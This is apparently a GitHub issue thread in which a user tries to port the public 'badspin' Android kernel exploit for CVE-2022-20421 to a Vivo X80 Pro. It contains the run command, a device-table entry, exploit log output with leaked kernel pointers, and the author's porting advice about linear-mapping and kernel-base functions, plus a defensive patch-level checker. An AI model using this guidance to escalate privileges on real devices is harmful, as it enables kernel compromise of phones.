vivo x80 pro dimnesty edition Failed #1

Closed
Ko-Hi-Dev opened this issue May 22, 2023 · 11 comments


Ko-Hi-Dev commented May 22, 2023

PD2186:/ $ LD_PRELOAD=/data/local/tmp/libbadspin.so sleep 1
Failed on dev_config_init:1341

Phone details:
Vivo x80 Pro Dimnesty Edition
[ro.build.fingerprint]: [vivo/PD2186/PD2186:12/SP1A.210812.003/compiler09052332:user/release-keys]

Patch Date:
[persist.vendor.connsys.patch.version]: [-1]
[ro.build.version.security_patch]: [2022-08-01]
[ro.vendor.build.security_patch]: [2021-12-05]

EDIT: I found out that we need to modify dev_config.h by adding an entry for this device:

    /* device table entry for dev_config.h */
    {
        /* PD2186B_A_12.0.19.3.W10 */
        .name = "Vivo x80 Pro Dimnesty Edition",
        .model = "PD2186",
        .android_version = 12,
        .android_security_patch.year = 2022,
        .android_security_patch.month = 8,
        .kernel_version = KERNEL_VERSION(5, 10, 66),
        /* .ram_offset = 0x28000000UL,*/
    },

Failed on dev_config_init:1341
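A defender-side check, added here as an example (not code from the badspin project or from the poster): given getprop output like the lines above, it extracts the model and patch levels that the dev_config.h entry keys on and flags whether the build predates the bulletin that fixed CVE-2022-20421. The fix patch level (2022-10-05) is an assumption to verify against the Android Security Bulletin.

```python
import re
from datetime import date

# Constructed sample input: the getprop lines quoted in the issue above.
SAMPLE_PROPS = """\
[ro.build.fingerprint]: [vivo/PD2186/PD2186:12/SP1A.210812.003/compiler09052332:user/release-keys]
[persist.vendor.connsys.patch.version]: [-1]
[ro.build.version.security_patch]: [2022-08-01]
[ro.vendor.build.security_patch]: [2021-12-05]
"""

# Assumption: the fix for CVE-2022-20421 shipped with the October 2022 Android
# Security Bulletin (platform patch level 2022-10-05). Confirm against the
# bulletin before relying on this value.
FIX_PATCH_LEVEL = date(2022, 10, 5)

PROP_RE = re.compile(r"^\[([^\]]+)\]: \[(.*)\]$")

def parse_getprop(text):
    """Turn getprop-style '[key]: [value]' lines into a dict."""
    props = {}
    for line in text.splitlines():
        m = PROP_RE.match(line.strip())
        if m:
            props[m.group(1)] = m.group(2)
    return props

def parse_patch_level(value):
    """Parse a YYYY-MM-DD patch level; '-1' or anything malformed gives None."""
    try:
        return date.fromisoformat(value)
    except ValueError:
        return None

def assess(props):
    """Return (model, android_version, platform_patch, vendor_patch, exposed).

    ro.build.version.security_patch is the level the Android bulletin refers
    to, so it decides exposure; a missing or malformed level counts as exposed.
    The vendor level is only reported alongside it.
    """
    parts = props.get("ro.build.fingerprint", "").split("/")
    model, _, android = parts[2].partition(":") if len(parts) > 2 else ("unknown", "", "unknown")
    platform = parse_patch_level(props.get("ro.build.version.security_patch", ""))
    vendor = parse_patch_level(props.get("ro.vendor.build.security_patch", ""))
    exposed = platform is None or platform < FIX_PATCH_LEVEL
    return model, android, platform, vendor, exposed

if __name__ == "__main__":
    print(assess(parse_getprop(SAMPLE_PROPS)))  # flags this PD2186 build as exposed
```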

Ko-Hi-Dev (Author) commented:

After getting stuck at the first attempt:

adb logcat -s BADSPIN
--------- beginning of main
05-22 21:31:28.410 8063 8063 I BADSPIN : ==========================================
05-22 21:31:28.410 8063 8063 I BADSPIN : Bad Spin Exploit (CVE-2022-20421) by 0xkol
05-22 21:31:28.410 8063 8063 I BADSPIN : ==========================================
05-22 21:31:28.410 8063 8063 I BADSPIN : [x] Looking for binder_proc's inner_lock offset
05-22 21:31:28.410 8063 8063 I BADSPIN : [x] Trigger vulnerability... (mode = 1)
05-22 21:31:29.806 8072 8072 I BADSPIN : [x] Trigger use-after-free
05-22 21:31:30.337 8068 8068 I BADSPIN : [x] Finish spinning at spin_lock()
05-22 21:31:31.339 8063 8063 I BADSPIN : [x] Found binder_proc's inner_lock offset: 576 (vuln_fd 72)
05-22 21:31:31.339 8063 8063 I BADSPIN :
05-22 21:31:31.570 8488 8488 I BADSPIN : [x] Shaping physical memory
05-22 21:31:32.070 8063 8063 I BADSPIN : [x] Trigger vulnerability... (mode = 3)
05-22 21:31:32.934 8642 8642 I BADSPIN : [x] Trigger use-after-free
05-22 21:31:32.939 8638 8638 I BADSPIN : [x] Waiting for timer threads
05-22 21:31:33.030 8639 8639 I BADSPIN : [x] Finish spinning at spin_lock()
05-22 21:31:34.015 8488 8488 I BADSPIN : ..................................................
05-22 21:31:34.015 8488 8488 I BADSPIN : [x] Failed.
05-22 21:31:34.015 8488 8488 I BADSPIN :
05-22 21:31:34.700 8941 8941 I BADSPIN : [x] Shaping physical memory
05-22 21:31:34.837 8063 8063 I BADSPIN : [x] Trigger vulnerability... (mode = 3)
05-22 21:31:35.546 9052 9052 I BADSPIN : [x] Trigger use-after-free
05-22 21:31:35.546 9045 9045 I BADSPIN : [x] Finish spinning at spin_lock()
05-22 21:31:35.556 9044 9044 I BADSPIN : [x] Waiting for timer threads
05-22 21:31:36.574 8941 8941 I BADSPIN : ..................................................
05-22 21:31:36.574 8941 8941 I BADSPIN : [x] Failed.
05-22 21:31:36.574 8941 8941 I BADSPIN :
05-22 21:31:36.800 9237 9237 I BADSPIN : [x] Shaping physical memory
05-22 21:31:37.126 8063 8063 I BADSPIN : [x] Trigger vulnerability... (mode = 3)
05-22 21:31:37.736 9357 9357 I BADSPIN : [x] Trigger use-after-free
05-22 21:31:37.741 9354 9354 I BADSPIN : [x] Waiting for timer threads
05-22 21:31:41.747 9355 9355 I BADSPIN : [x] Finish spinning at spin_lock()

05-22 21:33:34.654 11258 11258 I BADSPIN : ==========================================
05-22 21:33:34.655 11258 11258 I BADSPIN : Bad Spin Exploit (CVE-2022-20421) by 0xkol
05-22 21:33:34.655 11258 11258 I BADSPIN : ==========================================
05-22 21:33:34.655 11258 11258 I BADSPIN : [x] Looking for binder_proc's inner_lock offset
05-22 21:33:34.655 11258 11258 I BADSPIN : [x] Trigger vulnerability... (mode = 1)
05-22 21:33:36.185 11261 11261 I BADSPIN : [x] Trigger use-after-free
05-22 21:33:36.736 11259 11259 I BADSPIN : [x] Finish spinning at spin_lock()
05-22 21:33:37.760 11258 11258 I BADSPIN : [x] Found binder_proc's inner_lock offset: 576 (vuln_fd 72)
05-22 21:33:37.760 11258 11258 I BADSPIN :
05-22 21:33:37.865 11323 11323 I BADSPIN : [x] Shaping physical memory
05-22 21:33:38.218 11258 11258 I BADSPIN : [x] Trigger vulnerability... (mode = 3)
05-22 21:33:38.929 11383 11383 I BADSPIN : [x] Trigger use-after-free
05-22 21:33:38.941 11380 11380 I BADSPIN : [x] Waiting for timer threads
05-22 21:33:40.951 11381 11381 I BADSPIN : [x] Finish spinning at spin_lock()
05-22 21:33:42.024 11323 11323 I BADSPIN : ...............................................*..
05-22 21:33:42.087 11323 11323 I BADSPIN : [x] Trying to escalate...
05-22 21:33:42.178 11323 11323 I BADSPIN : [x] Found corrupted ptmx and pipe.
05-22 21:33:42.181 11258 11258 I BADSPIN : [x] Leaking pipe buffer...
05-22 21:33:43.283 11258 11258 I BADSPIN : [x] Leaked pipe buffer oprerations: ffffffe827200068
05-22 21:33:43.283 11258 11258 I BADSPIN : [x] Leaked pipe buffer page : ffffffff0b1c2580

Ko-Hi-Dev changed the title from "Failed" to "vivo x80 pro dimnesty edition Failed" on May 23, 2023

0xkol commented May 23, 2023

It looks like the second attempt succeeded (shaping + vulnerability + found corrupted pipe) which is good news. For the rest of the exploit to work you will probably need to do some adjustments. In particular: the function to_lm(), which converts a kernel pointer to the linear mapping, will need to be modified. (If the vivo device behaves like the pixel 6 (have no physical kaslr) then the change should be trivial.)

Also, the way the kernel base is found might need some modification. (Currently the kernel base is found by scanning for kallsyms for pixel 6.)

Pro tip: consult /proc/iomem.


Ko-Hi-Dev commented May 23, 2023

Yeah, the main issue is we can't use cat /proc/iomem, it only returns permission denied.

Neither is source code available for the device.

I'm not 100% sure if we do use kaslr either.


0xkol commented May 24, 2023

I see. Try assuming it's like the pixel 6 in the to_lm() and other places (look for is_device("Google Pixel 6")); it might just work out of the box.


Ko-Hi-Dev commented May 24, 2023

> I see. Try assuming it's like the pixel 6 in the to_lm() and other places (look for is_device("Google Pixel 6")), might just work out of the box.

I'll give you an output of the log with verbose attached (since the last two weren't with verbose enabled):

log.txt

It seems like we also get monitor_thread_a: Found dead binder (cookie = 0x5858585858585858) at the beginning, then it seems to disappear.

log1.txt


0xkol commented May 24, 2023

When it found the corrupted pipe it should work deterministically from this point onwards. You probably need to change the conversion to the linear mapping as I said earlier.

Ko-Hi-Dev (Author) commented:

@0xkol
I'm sorry, but can you elaborate on "pointer to the linear mapping"?

I'm not really sure what you mean by it.

If it cannot be done from cat /proc/iomem, is there any other way to get it?

Can we get it from kallsyms?


0xkol commented May 27, 2023

Hi, please try the new version with the function pointers kimg_to_lm and find_kbase. If you are not sure, you might just set them to the same values as for the Pixel 6.

Ko-Hi-Dev (Author) commented:

> Hi, please try the new version with the function pointers kimg_to_lm and find_kbase. If you are not sure, you might just set them to the same values as for the Pixel 6.

Yeah, it still crashes. It tries to trigger the exploit and dies. I'm unsure if it can be due to vivo actually having security measures regarding root. Can that be the issue?


0xkol commented May 29, 2023

Sorry I don't own such a device so there's nothing more I can do remotely....

Ko-Hi-Dev (Author) commented:

> Sorry I don't own such a device so there's nothing more I can do remotely....

Well, at least you have done your part trying to help. I'll try to look into it when I have time.

I have another phone I can try this on.

I've heard vivo does block root through the kernel, especially the su command, but who knows.

I might try to log while running the exploit and see if I can get any more info.

Thanks for taking your time 🙏

0xkol closed this as not planned (won't fix, can't repro, duplicate, stale) on Sep 3, 2023